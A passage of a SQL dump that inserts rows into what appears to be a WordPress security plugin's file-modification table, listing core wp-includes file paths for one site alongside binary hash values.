('Ÿ4ã”Zs™é.]åñ*', 'wp-includes/blocks/table/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"Ò®»-uYBr›ÜéyÔZþ', '¦¹ñ‰¬ñuÅšÇáÌk°¾1ñ¡h˜™ëtõC©oÕ­˜(', '', 0, '?'),
('ùäK|HÂ#Õ[›ûxŒÉ', 'wp-includes/blocks/tag-cloud/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'u:y‹VÎËÔ”³”Âõ+', ' ¯ß3j\0êÑCãê"D){UK–VçÊ›©d%„òÄ', '', 0, '?'),
('4qEyVS/ôÌo}˜', 'wp-includes/blocks/tag-cloud/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’:æŠ°	y''R£"Cóc', 'ÕK Jwb3POü[bge|Û=wÖ¯Und0R2', '', 0, '?'),
('e0Ó8ÌÎ/¢;t…', 'wp-includes/blocks/tag-cloud/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q{¬ÖO¿Ð¥©¨Û/', 'a&ÁgBñ¥m¸§óAR[SjËŒÐzŠn.¥ˆ', '', 0, '?'),
('QCýÈ§¤ÀŸ$9B)¼ŽM', 'wp-includes/blocks/tag-cloud/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª“/\\½õkvsÏ\nà\\°>', 'U?ÎeáþÅ3Õïói;eHpq\\¿Jy†\nœ%ê™²', '', 0, '?'),
('E4ÐïD''BI¦Ôçü_#s', 'wp-includes/blocks/tag-cloud/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K‘\Z±ðÝ*A,ð¢X3ŽE', '_FÆJ.½È–	Y*ËX		L0ÆUða ¸Ç"—±', '', 0, '?'),
('uí:ìz§2©DQÉï4', 'wp-includes/blocks/tag-cloud.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/tag-cloud.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|j6áç¬ßìVžs®‘Ü&V', 'Ö´iCkë·-*QÌ¾¹èq3ÖØwõÿ°šySêa', '', 0, '?'),
('wá§Õ‹\\à˜GÐû&•¢øA', 'wp-includes/blocks/template-part/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{oÅ…‰tcÖ7»Sˆ/(', ' ³v*„r“—çè‚u¨ìß©ÇMqR	!Âg)M?žŸ', '', 0, '?'),
('>©ý%·ÉÖì¾ÞH²“', 'wp-includes/blocks/template-part/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬Ne*YBÝê‰VœsÊ‡¸2', 'Ëÿ§‹]ge$ÇÎ¶^*&HL£~¢ÕÉ£³Ûs“', '', 0, '?'),
('6·lLX/ÔêHŽÕ3X=E', 'wp-includes/blocks/template-part/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÛÅò£²hÂBu¥}iÃ', '_o=;X#Ç—;†;ç1¯¡w\0u:Ê²hçˆ¾«', '', 0, '?'),
('¶µ8Šòp>°Ä‰áÁ+(ž', 'wp-includes/blocks/template-part/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬Ne*YBÝê‰VœsÊ‡¸2', 'Ëÿ§‹]ge$ÇÎ¶^*&HL£~¢ÕÉ£³Ûs“', '', 0, '?'),
('pÐÇt@ÔäþœC´F', 'wp-includes/blocks/template-part/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÛÅò£²hÂBu¥}iÃ', '_o=;X#Ç—;†;ç1¯¡w\0u:Ê²hçˆ¾«', '', 0, '?'),
('™\\Žl/§S¬½	úÇÊ¨ƒz', 'wp-includes/blocks/template-part/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„ùdßd†Àl§•ñOÔB', '<EÓ"bÂk,â@Q Ô ‘Â¶â3žI˜ã#‹¯/Õ"’¸', '', 0, '?'),
('\\êÁLƒâä¢Ý\rn¸iø®', 'wp-includes/blocks/template-part/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ž,J²d¢Õä<TS\\˜', 'ç#¿”XQŸ€wEÑSbz)òõÁlÆ!ïuO _kÏ1Ë', '', 0, '?'),
('Ÿ9V#}ýXˆ<åÒ\n[R', 'wp-includes/blocks/template-part/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„ùdßd†Àl§•ñOÔB', '<EÓ"bÂk,â@Q Ô ‘Â¶â3žI˜ã#‹¯/Õ"’¸', '', 0, '?'),
('Ömá‹žj¨ï¼ÇWìBv|', 'wp-includes/blocks/template-part/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ž,J²d¢Õä<TS\\˜', 'ç#¿”XQŸ€wEÑSbz)òõÁlÆ!ïuO _kÏ1Ë', '', 0, '?'),
('½mÝa#$sõm˜xµñëQ', 'wp-includes/blocks/template-part.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/template-part.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žãR6d’w*+\0Œ„ª', ',Öè\ZW4÷º6>j®ö8ü)º¹Ú3ð³™ \0=CT', '', 0, '?'),
('œ•þ˜ßwtzïåëÑ	', 'wp-includes/blocks/term-description/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êþ,‰Æ¼À]œ_õk4ƒ†', '¶óä}?Ê¦,k:6gA]]§3°Os\n$íWzUà3!', '', 0, '?'),
('Ýµ¿iK#¬èÃB]•¨', 'wp-includes/blocks/term-description/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð2îç’ŒäoF™`@_Ð', 'X¢øH)e¼?J×ÒWyî2ö¡\rÏkq‘üL•ôïç‡K-7', '', 0, '?'),
('Ïi}ß¯Š)]M“', 'wp-includes/blocks/term-description/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@5«•^i­ß¨Œ\r¶!g', ',1Ð£Q‰2ìŸö@øŒí\nrr…ìh/XÝ”2Hñ5ˆ', '', 0, '?'),
('åI¿)ß‚:þ$©í"9s›', 'wp-includes/blocks/term-description/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð2îç’ŒäoF™`@_Ð', 'X¢øH)e¼?J×ÒWyî2ö¡\rÏkq‘üL•ôïç‡K-7', '', 0, '?'),
('t¾]¯ÈüW2`Ó,Z', 'wp-includes/blocks/term-description/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@5«•^i­ß¨Œ\r¶!g', ',1Ð£Q‰2ìŸö@øŒí\nrr…ìh/XÝ”2Hñ5ˆ', '', 0, '?'),
('…Ï2P&ø“zZ¥.›äÛ', 'wp-includes/blocks/term-description.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/term-description.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷$îË£[šƒìÁ"', 'uÑowÎÿÇQR¼ðBPN¯)x?ÆGÒ÷õgÜ³—', '', 0, '?'),
('Â6³¿MÍ“Æè)Ì»', 'wp-includes/blocks/text-columns/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'IŽ''ò|ÙÜõËðë¢=8¬', '¾¸Ný‰@HK™‘0þ”½ø×Î9Lœÿ*î“ãÈ|', '', 0, '?'),
('Ë \\i®ÆÊõ¢xãâ(0Æ', 'wp-includes/blocks/text-columns/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' û…+ö™Á+§ªR\ržþ', '$£ÿYö|e©¨qÓÐu\0dfÁ°DbtFêí^ú	ŒóT', '', 0, '?'),
('Þšíê§­Þß…"gÑ<Nr', 'wp-includes/blocks/text-columns/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ñëïwòå`}ÞNû\nºþX', '¬t!ïãþlŽ`¯|*µ^…«Ù0»	Ýl$C§»ò;‡í', '', 0, '?'),
('ó$óâÞéúOvašª¸8ï%', 'wp-includes/blocks/text-columns/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' û…+ö™Á+§ªR\ržþ', '$£ÿYö|e©¨qÓÐu\0dfÁ°DbtFêí^ú	ŒóT', '', 0, '?'),
('Ñ:¹\nØÇy­ËŒ"4«', 'wp-includes/blocks/text-columns/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ñëïwòå`}ÞNû\nºþX', '¬t!ïãþlŽ`¯|*µ^…«Ù0»	Ýl$C§»ò;‡í', '', 0, '?'),
('’ó\r€m¹s\0@Î=[Æ', 'wp-includes/blocks/text-columns/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w®Mg5E_"Ûš6†—-Ñ', 'Ý´º»ø3\0·­Ëv"ªEWÚÉPt½ÌTTõuÞ,`', '', 0, '?'),
('u×Èk6¸O­>õ&ŸW', 'wp-includes/blocks/text-columns/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'c^õ*›ÆwŒ¶Gã¾Q×', '–+\\¦–÷1{*CãG+î¸è˜JõåæúLv', '', 0, '?'),
('q ØZý\0=sˆ\rßÍ\rÓ', 'wp-includes/blocks/text-columns/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'a™Â¦ax:²ü`]''^î', 'þeÂ±ñ²Qûn¬S„‚0>,ëi(tHUn´Zó)ÏK', '', 0, '?'),
('"\râ†»–7l~ÄçËAÉ', 'wp-includes/blocks/text-columns/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/text-columns/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½ëžÎ$6EÉ«8ì‚y', 'ç¡\\{ 1†E®¼H=F§''Ö±ÙüÇLë=tñ„0§XÆ', '', 0, '?'),
('=Æà§Ó¨¤ç¤\0E¨ÒÖ', 'wp-includes/blocks/verse/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w×w ~¸gïüƒg¦«é', '%VÜÁZ’­\ZpÉ7†çWâÑYÆÏVOÒ#Ço9h9', '', 0, '?'),
('`Bd3ó¼ Cöj¤3šÝn', 'wp-includes/blocks/verse/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãv¶ô<_55Ú¬Q785', '+Ú.¹÷šýð…D[è7¬ U«=áaI¿ì‘-H\0w', '', 0, '?'),
('Ô»q¾Eè{äÄð‘n¥¹Ž', 'wp-includes/blocks/verse/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æeá©Ë£RìR|¼õ©­—', '…j/+ÕH‹æÓ+Æ×ˆÏz*càÙ*‚±a‡ažeÁ', '', 0, '?'),
('œÒ<ãÛ)»" Í¢vY4', 'wp-includes/blocks/verse/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãv¶ô<_55Ú¬Q785', '+Ú.¹÷šýð…D[è7¬ U«=áaI¿ì‘-H\0w', '', 0, '?'),
('/>“çüß»(Èæ3Œ', 'wp-includes/blocks/verse/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/verse/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æeá©Ë£RìR|¼õ©­—', '…j/+ÕH‹æÓ+Æ×ˆÏz*càÙ*‚±a‡ažeÁ', '', 0, '?'),
('Ô›÷aùÚýšáÁtr­‡', 'wp-includes/blocks/video/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?ýÜ*å>„”Ê" Z8|', 'CÿF 5Äoeå³”Þ—¬	‰ãW6ÈQÚ÷T|¬Ù3¯', '', 0, '?'),
('=”[:Šý„\r&ôFíÝE', 'wp-includes/blocks/video/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™ØÿíÝ7¦ÊBMâ¢¹{Ù?', '%¥yÊ„ÕSR¬M\nÈëðF^tq‚ø»g€ý«È', '', 0, '?'),
('ž(ŒóãÏ¹¦éØ²ó°óˆÔ', 'wp-includes/blocks/video/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'yŸ‘NM„LºŽ¶Áý', ' y—QKÄÚÃ›õ§JZ”	 {¨ Îv2¡½¦ˆé2F', '', 0, '?'),
(']è4dû9´ÀàCÄ<s“3', 'wp-includes/blocks/video/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'SL¯ÞYÁYõ]F±þÇ–Â»', 'ØÚ´ùhÇï ÷(_HbbIšR<s²Dg£–AQ_', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('ÿ"UÕF~B‡.èÜS', 'wp-includes/blocks/video/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²]"†Ï\rL<Jk\0¨ò', 'ŒÇ–Iyüz­3¤ˆºcÃNVAN»¯Êðá#Ê(c•´Œ', '', 0, '?'),
('ÙçÊ[s&iµu)ùn', 'wp-includes/blocks/video/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k"®€µÝéD)·@+Ä6', 'uüHÀ¦yÀ˜èÂUº:QaÈõØ»ogFàÅ_5p]‘ŠK', '', 0, '?'),
('Ë†]g–1{[	œpeŽ', 'wp-includes/blocks/video/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.Žq/QØð•?m"q', '¯¾C²D²·@ÛÅbë£Ï¹šëõÝ>aEÎÅá', '', 0, '?'),
('¡täÞ.!hît¸%h¬á', 'wp-includes/blocks/video/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k"®€µÝéD)·@+Ä6', 'uüHÀ¦yÀ˜èÂUº:QaÈõØ»ogFàÅ_5p]‘ŠK', '', 0, '?'),
('kEìðn‚fÏ‹ßŸÈ''qb', 'wp-includes/blocks/video/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.Žq/QØð•?m"q', '¯¾C²D²·@ÛÅbë£Ï¹šëõÝ>aEÎÅá', '', 0, '?'),
('”U4ùîÖNb<#öë_˜', 'wp-includes/blocks/video/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡]C-®Í—âÉíd^f', '´Ó;nA5ädSôÔÄäwDPGH/Uà¥ØŒoUË•', '', 0, '?'),
('ñšÍ¨Þ¹ÀÂ0É§ä·‘Ù', 'wp-includes/blocks/video/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì©û2»^€n>Š]·P1_', '}Ÿ0Ñé\r Èý}pƒu¬\0Q(VAÿêK›.“9Ýïq¨<', '', 0, '?'),
('¿ª7FWàÑm!w—µSZ=', 'wp-includes/blocks/video/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡]C-®Í—âÉíd^f', '´Ó;nA5ädSôÔÄäwDPGH/Uà¥ØŒoUË•', '', 0, '?'),
('\0ÑKô°÷%¿5,ä¼$Ë£', 'wp-includes/blocks/video/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/video/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì©û2»^€n>Š]·P1_', '}Ÿ0Ñé\r Èý}pƒu¬\0Q(VAÿêK›.“9Ýïq¨<', '', 0, '?'),
('šÅpššÙï6‹É¨±ˆZL', 'wp-includes/blocks/widget-group/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/widget-group/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xs–ù³yƒ¨GKƒÝ®à9"', '5/\nAÿz''¦Ÿ„ÏppsÅiâähÝØc"Âs<»–', '', 0, '?'),
('‹<»Ínáoz#Ù?:', 'wp-includes/blocks/widget-group.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/widget-group.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûFi5ãy@6\Z¶Ÿ•9U', 'ÚÉ-üÛ~çâž(ÞI\Z¼ùþrÌjÞ,`rvvç&\\†õ', '', 0, '?'),
('d˜£…AuhÅê 041á', 'wp-includes/blocks.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú\0êÈæÿ7é_‰tÞu`', '‹xö‚ÌÏœÖØÁšÀŸù‹î]Æ7ãÓÈqo@ÿJKê', '', 0, '?'),
('Ð>›sËl›WD7õM°', 'wp-includes/bookmark-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/bookmark-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xU¥@ˆü õ‡õˆaË', 'ÌáV°‚º©vZê¢2(MpðÔU{`K®¾6¡^ñc', '', 0, '?'),
('†Ÿ\0¦>#ŠÑ›á­z(', 'wp-includes/bookmark.php', '/home/equipm11/public_html/happythinking.com/wp-includes/bookmark.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æùhÿGx<›Æ7,jHÂ', 'óQ„4>´¡@­8P_l\Z/Úù?#UÜ¸—ÐXÜ', '', 0, '?'),
('(WQ=3ÑÈyîúÞb6', 'wp-includes/cache-compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/cache-compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'BÆ#X¹TíÙpPÅŠ:M', 'Š£ƒ`·a=|«;ä^kyâŠ	8uûÑG˜ù6´Ì', '', 0, '?'),
('Ç…ú9 Ù9: ÷¤\Zþ', 'wp-includes/cache.php', '/home/equipm11/public_html/happythinking.com/wp-includes/cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''­«~ó‘Ä©ºBë<ùX', '§Í8ÒÓhæ–bS¯z•Žm÷sabjK\0äîæ—%¿o', '', 0, '?'),
('Ü2Gý?¦_æü\\èÆú-B', 'wp-includes/canonical.php', '/home/equipm11/public_html/happythinking.com/wp-includes/canonical.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'V¾[M±;NX{~R†Ñ ±', 'x$]­Yjý9yX)zì}¬t láŠ®šª&º§B8', '', 0, '?'),
('ëãYCàÞoƒoRÔäºž”', 'wp-includes/capabilities.php', '/home/equipm11/public_html/happythinking.com/wp-includes/capabilities.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‹Sî»Üq©ÌÓ?ºf6{Ë', 'š''¥2)ŠN`qépèä3õó ÝåÃõ—úò/öÃŠ„õ', '', 0, '?'),
('‰j®ÃIîÔÓ<êŸŸ³†iU', 'wp-includes/category-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/category-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ò7lÝÞ:Ø¤=Ùã).ÔX', 'žGì;`ó9\Z"€~ë´ÒþÔþjšzS$ÞØ•', '', 0, '?'),
('Dï²Ö5\n''å\\¥Ã~W“‰', 'wp-includes/category.php', '/home/equipm11/public_html/happythinking.com/wp-includes/category.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùMðÛ»x/Ò²\nÝöîÂò', 'õ˜À¦óõÁB#jû–Ô®x¥²˜PaÜÓÙ³™×‚', '', 0, '?'),
('mD’ÆTŽms‘·òA©}', 'wp-includes/certificates/ca-bundle.crt', '/home/equipm11/public_html/happythinking.com/wp-includes/certificates/ca-bundle.crt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'UC%PÊ…êˆ$ÀËpöŸ¥', 'à·<eN¬¢§fÀFKþFƒ¸öoò-¿YöìÖÓSlUø', '', 0, '?'),
('èJ‰Ùåy”ž0mì`ä¨/', 'wp-includes/class-IXR.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-IXR.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜É0¼ãàC`q¥xÛü', ']ÍÝñzïpŸ€qŸN"CKWÇä›é´›‰øcŽôM', '', 0, '?'),
('8mÅ\nd7¿õàã4t…', 'wp-includes/class-avif-info.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-avif-info.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<«Ð(%àbv³ÌwÇyÿ', '‡öºóç÷¤V—G‹þMÆU—LI,•Â¼¨¿&Ê', '', 0, '?'),
(':<·$ŽÍ0,w"&e({', 'wp-includes/class-feed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-feed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾Ž†>ùyÀÜ«¯ÿ]ÈôT', '­8ÚÉj2ÖyÜN!qÊ©p±ª†ñùÛt\0Aõ2\\Y', '', 0, '?'),
('!›”È@|˜4«°n­ô', 'wp-includes/class-http.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-http.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™›ˆWQK\r½àt°Çh<', 'aÒjÅÊEXOÃtf}ž;g$³Ø®³Ö4³4ÞäÑ´ÉíÆ', '', 0, '?'),
('Ø&ãZhÍ$›Ã‰o‚', 'wp-includes/class-json.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-json.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#ÉÞ°ÑBsâAÍ*‡.ÚÆ', 'uù8ÙgÅÇ“9½ëÀ­ùšØÍñÑHøK2øJ÷¸•\0,¡', '', 0, '?'),
('£í‘Eââí•ÀQ?èÞ	(Ä', 'wp-includes/class-oembed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-oembed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y§¼ðÒ¿~ŸK§Hˆ< f', '? ëAnœ6œ²”ƒ&z''`Õ,êø¶jæ]mÀúþ§v', '', 0, '?'),
('	QW¯ïŒˆ~-Ê\0dÅ', 'wp-includes/class-phpass.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-phpass.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'º\\¬‘YnB\0tvÛH?e', 'ÀÁ ùC]Ü…w#0Àd|¢™YðÕÃ¸.\nÖº¬ä', '', 0, '?'),
('ì8·Ú§™ºs}ï÷Õ¶àNi', 'wp-includes/class-phpmailer.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-phpmailer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''ÅÙF!;‰ 2ó±»±4Å&', 'G±ÄZG…ãƒí5ÿ_Üš…à¬XS[WˆÄS:9p@Û?œ', '', 0, '?'),
('"µòÉàÉu>1Ð7þŽŸ', 'wp-includes/class-pop3.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-pop3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')@ä¿É˜n¾èÛ§œ', '¬­Ë‡ñ`9_ÞAæ˜{æŽ.â¡Pm$†Ÿð¶', '', 0, '?'),
('öÞ*Ê7\rçæ?á¶ý', 'wp-includes/class-requests.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-requests.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò\0\Z©ÖNzÜjé3', '1äÁŽW~f˜ÑW½…“¢;\0âWœ5²Uˆ¢8À¦<î', '', 0, '?'),
('¸è«\\ ¯”IÑ»Á»è,', 'wp-includes/class-simplepie.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-simplepie.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒÀqe·T¶3¸ Ÿd™å¡­', '|-4¬Ý×#ôo~Ëð¡m‘‹[Œz?¶v§VîÝÂÖÿ', '', 0, '?'),
('¿àÎš,ÌQ˜a»gl·Ä\Z¯', 'wp-includes/class-smtp.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-smtp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.æ–šaˆqØÝ“Ï ©¾Ž', 'B)HJ¢¬«¥ÚòR¨psÐ Ýø˜¿©	+''8k_', '', 0, '?'),
('e®ä__ó%÷è®xˆÀÛ', 'wp-includes/class-snoopy.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-snoopy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚kèîöY$0òôí{', '3±[D''Úó\ZX5ÜíMHm°œé$Â«R6è›ƒ¨', '', 0, '?'),
('„)Å©¶ê…2[¤	Ó4¨_a', 'wp-includes/class-walker-category-dropdown.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-category-dropdown.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢‡Ô‚ïIV­*ùÞtü', 'ÃIw°^ÏËîKHÄ¶\\ìsŽ³~BW—ãº¾fI', '', 0, '?'),
('•c­ÛnxÀÔº|È', 'wp-includes/class-walker-category.php', '/home/equipm11/public_html/happythinking.com/wp-includes/class-walker-category.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U?ž˜DÙÔ>"6mÀ', 'K¾oÚ_Æ–Rí”jìDÜ©èz¥VL5úÒ\nz—VÅ', '', 0, '?'),
